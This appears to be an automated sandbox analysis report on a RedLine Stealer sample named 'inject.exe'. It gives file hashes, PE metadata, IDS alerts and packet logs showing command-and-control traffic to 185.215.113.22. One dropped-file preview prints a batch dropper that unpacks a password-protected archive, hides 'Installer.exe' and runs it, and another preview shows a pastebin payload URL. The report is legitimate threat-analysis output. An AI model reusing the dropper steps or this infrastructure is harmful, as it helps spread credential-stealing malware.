                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:49152:5RcsCieJLOveuKY6V5Rqgoq1cZvGcn2MyelH+5VTwQx6HtqVNP6ph:Pcs2JOmvR0qTClH+5VMNh
                                                                                                                                                                                                                                        MD5:AE5771940899F79E634B6E4475040467
                                                                                                                                                                                                                                        SHA1:225434A4900232053FBEFF5A60A08E53CFC1436A
                                                                                                                                                                                                                                        SHA-256:B9740CF94F4A77BB2D61EC79FF342E7C739BB35B2B61F32E9B5F2D09218C24FC
                                                                                                                                                                                                                                        SHA-512:2B50DA042539E81EA4B1B5DBDE62F3AEE6473DF550401DF2BC08505FC77A178994AB6608960251873B48089AE171E6365AE52408A493E71389B98D4796898134
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:PK........Rn.Yh.2..E!..E!.....file_11.zip.aO.Y.......9m.X..v..&....j^..U.........9>..&....;.M.B.....>Ez...(..v..........X.<..._..f.o?..l...?../s .-...u.m.i.!%.E.@w...do/.W/..=.#.....Lde...QQN....Cu..w..P.d....Y..2z.I.f$DUo}WA.....h[....H4....b..`...k.#....fo..g..UA.....j..;......N.?...[..+.|.Ob....W...iS3...6.......fJ.......[.u!.BW.OH..:9..*/_....O.!]...@....{V.....}.T.I.C"...X+_V*.s.|V..o....$;Cr...V....?.5b..g..x.C.a...k1..n..,2..6....}....Q....gq3U.X......].w..T.buX..!.?..Q......_`.....K..B.........b......U...bqA..F+....cf5....,.I.m......qu...#..%.k.....AH.K..:..zq.~.....h...L6.8L;...6..l....Vr.3.,....w(.mj..b...Kf...u...M..V..IV.-.....G+......h[I.Vs...U.5...c':..u..3S...'@.[...;.L...4f.].D.A..TB....P.'.l.X....o...n......l.+..8b.dN.Y...`.@.r.j.i)...K+:.Tr.:<W...L.@.}.......Y.A/.bf.N......-L...X....R.:.n.cq.........&..h|.5.m..z.........y.d..>...Q#..p.7..6.C....Q.l...R..O.'!.,...'...|Y~.`*$.D..kSD...kdl%x...T2Uo..<.......q}"......}Rzw..Y..u
                                                                                                                                                                                                                                        Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2180698
                                                                                                                                                                                                                                        Entropy (8bit):7.99990891733921
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:49152:5RcsCieJLOveuKY6V5Rqgoq1cZvGcn2MyelH+5VTwQx6HtqVNP6ph:Pcs2JOmvR0qTClH+5VMNh
                                                                                                                                                                                                                                        MD5:AE5771940899F79E634B6E4475040467
                                                                                                                                                                                                                                        SHA1:225434A4900232053FBEFF5A60A08E53CFC1436A
                                                                                                                                                                                                                                        SHA-256:B9740CF94F4A77BB2D61EC79FF342E7C739BB35B2B61F32E9B5F2D09218C24FC
                                                                                                                                                                                                                                        SHA-512:2B50DA042539E81EA4B1B5DBDE62F3AEE6473DF550401DF2BC08505FC77A178994AB6608960251873B48089AE171E6365AE52408A493E71389B98D4796898134
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:PK........Rn.Yh.2..E!..E!.....file_11.zip.aO.Y.......9m.X..v..&....j^..U.........9>..&....;.M.B.....>Ez...(..v..........X.<..._..f.o?..l...?../s .-...u.m.i.!%.E.@w...do/.W/..=.#.....Lde...QQN....Cu..w..P.d....Y..2z.I.f$DUo}WA.....h[....H4....b..`...k.#....fo..g..UA.....j..;......N.?...[..+.|.Ob....W...iS3...6.......fJ.......[.u!.BW.OH..:9..*/_....O.!]...@....{V.....}.T.I.C"...X+_V*.s.|V..o....$;Cr...V....?.5b..g..x.C.a...k1..n..,2..6....}....Q....gq3U.X......].w..T.buX..!.?..Q......_`.....K..B.........b......U...bqA..F+....cf5....,.I.m......qu...#..%.k.....AH.K..:..zq.~.....h...L6.8L;...6..l....Vr.3.,....w(.mj..b...Kf...u...M..V..IV.-.....G+......h[I.Vs...U.5...c':..u..3S...'@.[...;.L...4f.].D.A..TB....P.'.l.X....o...n......l.+..8b.dN.Y...`.@.r.j.i)...K+:.Tr.:<W...L.@.}.......Y.A/.bf.N......-L...X....R.:.n.cq.........&..h|.5.m..z.........y.d..>...Q#..p.7..6.C....Q.l...R..O.'!.,...'...|Y~.`*$.D..kSD...kdl%x...T2Uo..<.......q}"......}Rzw..Y..u
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\conhost.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):476
                                                                                                                                                                                                                                        Entropy (8bit):5.09690163183538
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:QUp+CF16g64CTFMj2LIQLvvk7WYCVGrMLvmuCCgXjgrXgX78agXrrEOXUigXY:QUpNF16g632Ckevk7WYCVGYTtS0rXS7Y
                                                                                                                                                                                                                                        MD5:A6D611790D8AFE6E81448CDF6DDB9EA4
                                                                                                                                                                                                                                        SHA1:4E402E68FC7130433A7004CBCE3834A8743BCF4C
                                                                                                                                                                                                                                        SHA-256:0C7BE4C51CD64A8B6D2235EE0EEAB8C98C565ED9B74B50C0EBA02750C3B24B2F
                                                                                                                                                                                                                                        SHA-512:2FAA6DE4F3E2872FE2575F775C282E17FAFB5AD4C31EB1DE118081F80F28B33E0C1ACFEC0779B5911314BA50A5A5C1EC11491A393C272F3EAB943636A6BF4938
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:..&cls..@echo off..mode 65,10..title g3g34g34g34g43 (34g34g45h6hj56j56j)..md extracted..ren file.bin file.zip..call 7z.exe e file.zip -p29586644319935208542739921766 -oextracted ..for /l %%i in (11,-1,1) do (..call 7z.exe e extracted/file_%%i.zip -oextracted..)..ren file.zip file.bin..cd extracted..move "Installer.exe" ../..cd....rd /s /q extracted..attrib +H "Installer.exe"..start "" "Installer.exe"..cls..echo Launched 'Installer.exe'...pause..del /f /q "Installer.exe"..
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2251
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:0158FE9CEAD91D1B027B795984737614
                                                                                                                                                                                                                                        SHA1:B41A11F909A7BDF1115088790A5680AC4E23031B
                                                                                                                                                                                                                                        SHA-256:513257326E783A862909A2A0F0941D6FF899C403E104FBD1DBC10443C41D9F9A
                                                                                                                                                                                                                                        SHA-512:C48A55CC7A92CEFCEFE5FB2382CCD8EF651FC8E0885E88A256CD2F5D83B824B7D910F755180B29ECCB54D9361D6AF82F9CC741BD7E6752122949B657DA973676
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):729
                                                                                                                                                                                                                                        Entropy (8bit):5.11212271596743
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:8G/y8vM/jwKdt//j/K3AEN6Qclfw/1127UwLnjDTwDMVFAi:8G/y8wj5djUNso/XUnLnjD0DMnAi
                                                                                                                                                                                                                                        MD5:ADE6854A8351E50758F93066F547C188
                                                                                                                                                                                                                                        SHA1:771278CB4FC00BDC54B95C2FE43C839F9D59FD6C
                                                                                                                                                                                                                                        SHA-256:FAA5DA36E19D42EA123A6765D50E6B27794DB08342850D1E36695332F8E47BC0
                                                                                                                                                                                                                                        SHA-512:3202F608789CAD4E8485B06344EACFE9AD48B197A4FAD94C9F15CAC07C7322BDB838F61F82955DA7C136952D61922E47E8CA4FB77CCBC7B47953D9943069C724
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview: [if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->.. [if gt IE 8]> > <html class="no-js" lang="en-US"> <![endif]-->..<head>..<title>Suspected phishing site | Cloudflare</title>..<meta charset="UTF-8" />..<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />..<meta http-equiv="X-UA-Compatible" content="IE=Edge" />..<meta name="robots" content="noindex, nofollow" />..<meta name="viewport" content="width=device-width,initial-scale=1" />..<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" />.. [if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]-->..cp..https://pastebin.com/raw/dq3hWX27..
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):345
                                                                                                                                                                                                                                        Entropy (8bit):5.046538254653124
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:AMMyS3pt+uoQcAxXF2SaioB4Dc8NmVSTgqF1AivwtHgN6qFfpap1tNGpKoip:pMpDh5RwXlCfTgqFyYw7qJA1tNGkoC
                                                                                                                                                                                                                                        MD5:5155BABB04DC876A4871112BA3AC2716
                                                                                                                                                                                                                                        SHA1:F7A7E8D917F4B829610ED476A51BE9096CF66918
                                                                                                                                                                                                                                        SHA-256:DA8B2175AEE6D2B8300AF87F89FBD77114349B41852CFCA04446CE7BCA990CB2
                                                                                                                                                                                                                                        SHA-512:C1A54C1BFC5E493B18C138D964112EC95ACEA7BD9F20F2971F666F6B152DA723A4B999118381FEC8D42F31B6D5F4A0ABA9F684800E0ECA4079A1BD2391D6CD59
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:..7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21....Scanning the drive for archives:.. 0M Scan. .1 file, 511531 bytes (500 KiB)....Extracting archive: extracted\file_1.zip..--..Path = extracted\file_1.zip..Type = zip..Physical Size = 511531.... 0%. .Everything is Ok....Size: 625464..Compressed: 511531..
                                                                                                                                                                                                                                        File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Entropy (8bit):7.986691365090859
                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                                                                        File name:inject.exe
                                                                                                                                                                                                                                        File size:321'536 bytes
                                                                                                                                                                                                                                        MD5:a1e894c08c924eec77ce07e2a8405b86
                                                                                                                                                                                                                                        SHA1:ff3f45d1773a07c2e92639ee7f0df24df4fbaf6f
                                                                                                                                                                                                                                        SHA256:527dbb0c86940e85a442e5eb558c9e2f8a20f257b1eb799ce32d6890c0fc48ad
                                                                                                                                                                                                                                        SHA512:25e472e5b83530871dae660d44b67a20f8defcedf872c9c376a396cd3e5b9dc10722f9500de06f0eef35f16df82c54d68a55b56f0e865dfea1b6aed86b7ed79d
                                                                                                                                                                                                                                        SSDEEP:6144:35SCOueHiXnEzBdbnSH34UC91eN9dnvR2E9Sw+/jF8CKG:pSCiHiXnEzvzd1eN3n52EEv7FRK
                                                                                                                                                                                                                                        TLSH:E8642353B7A84236D674A13EB1079FF30FC49E7164A22BD67A594A01B9E33314732F4A
                                                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...J..f............................>.... ........@.. .......................@............`................................
                                                                                                                                                                                                                                        Icon Hash:00928e8e8686b000
                                                                                                                                                                                                                                        Entrypoint:0x44fd3e
                                                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                        Subsystem:windows cui
                                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                        Time Stamp:0x66F2D34A [Tue Sep 24 14:57:14 2024 UTC]
                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                        OS Version Major:4
                                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                                        File Version Major:4
                                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                                        Subsystem Version Major:4
                                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                                        jmp dword ptr [00402000h]
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x4fce80x53.text
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x500000x5c8.rsrc
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x520000xc.reloc
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x4fbb00x1c.text
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                        .text0x20000x4dd440x4de00616e73888960f3b6f7126622e35334fdFalse0.9924226274077047data7.994475414481835IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                        .rsrc0x500000x5c80x6006edf142bbb087d6ac9c3d962ee707434False0.4361979166666667data4.113027716683536IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                        .reloc0x520000xc0x2005e8783c5fb744f953e2dd557e731c328False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                        RT_VERSION0x500a00x338data0.44660194174757284
                                                                                                                                                                                                                                        RT_MANIFEST0x503d80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041
                                                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                                                        mscoree.dll_CorExeMain
                                                                                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                        2024-09-29T09:44:02.309242+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549704185.215.113.2280TCP
                                                                                                                                                                                                                                        2024-09-29T09:44:02.309242+02002046045ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)1192.168.2.549704185.215.113.2280TCP
                                                                                                                                                                                                                                        2024-09-29T09:44:02.541531+02002043234ET MALWARE Redline Stealer TCP CnC - Id1Response1185.215.113.2280192.168.2.549704TCP
                                                                                                                                                                                                                                        2024-09-29T09:44:07.926652+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549704185.215.113.2280TCP
                                                                                                                                                                                                                                        2024-09-29T09:44:12.194080+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549704185.215.113.2280TCP
                                                                                                                                                                                                                                        2024-09-29T09:44:15.827930+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549704185.215.113.2280TCP
                                                                                                                                                                                                                                        2024-09-29T09:44:16.498001+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549704185.215.113.2280TCP
                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:01.391658068 CEST4970480192.168.2.5185.215.113.22
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:01.396800995 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:01.396912098 CEST4970480192.168.2.5185.215.113.22
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:01.405046940 CEST4970480192.168.2.5185.215.113.22
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:01.409903049 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:02.277618885 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:02.309242010 CEST4970480192.168.2.5185.215.113.22
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:02.314229012 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:02.541531086 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:02.582720995 CEST4970480192.168.2.5185.215.113.22
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:07.926651955 CEST4970480192.168.2.5185.215.113.22
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:08.149446964 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:08.413638115 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:08.413753033 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:08.413819075 CEST4970480192.168.2.5185.215.113.22
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:08.414014101 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:08.414086103 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:08.414127111 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:08.414132118 CEST4970480192.168.2.5185.215.113.22
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:08.414172888 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:08.414223909 CEST4970480192.168.2.5185.215.113.22
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:08.414417982 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:08.414486885 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:08.414526939 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:08.414531946 CEST4970480192.168.2.5185.215.113.22
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:08.457714081 CEST4970480192.168.2.5185.215.113.22
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.888732910 CEST4970480192.168.2.5185.215.113.22
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.893811941 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.893874884 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.893899918 CEST4970480192.168.2.5185.215.113.22
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.893918037 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.893924952 CEST4970480192.168.2.5185.215.113.22
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.893975019 CEST4970480192.168.2.5185.215.113.22
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.893984079 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.894026041 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.894038916 CEST4970480192.168.2.5185.215.113.22
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.894066095 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.894078016 CEST4970480192.168.2.5185.215.113.22
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.894108057 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.894115925 CEST4970480192.168.2.5185.215.113.22
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.894155025 CEST4970480192.168.2.5185.215.113.22
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.894187927 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.894228935 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.894238949 CEST4970480192.168.2.5185.215.113.22
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.894268990 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.894274950 CEST4970480192.168.2.5185.215.113.22
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.894320965 CEST4970480192.168.2.5185.215.113.22
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.899183035 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.899224997 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.899236917 CEST4970480192.168.2.5185.215.113.22
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.899277925 CEST4970480192.168.2.5185.215.113.22
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.899290085 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.899331093 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.899343967 CEST4970480192.168.2.5185.215.113.22
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.899377108 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.899391890 CEST4970480192.168.2.5185.215.113.22
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.899430037 CEST4970480192.168.2.5185.215.113.22
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.899450064 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.899498940 CEST4970480192.168.2.5185.215.113.22
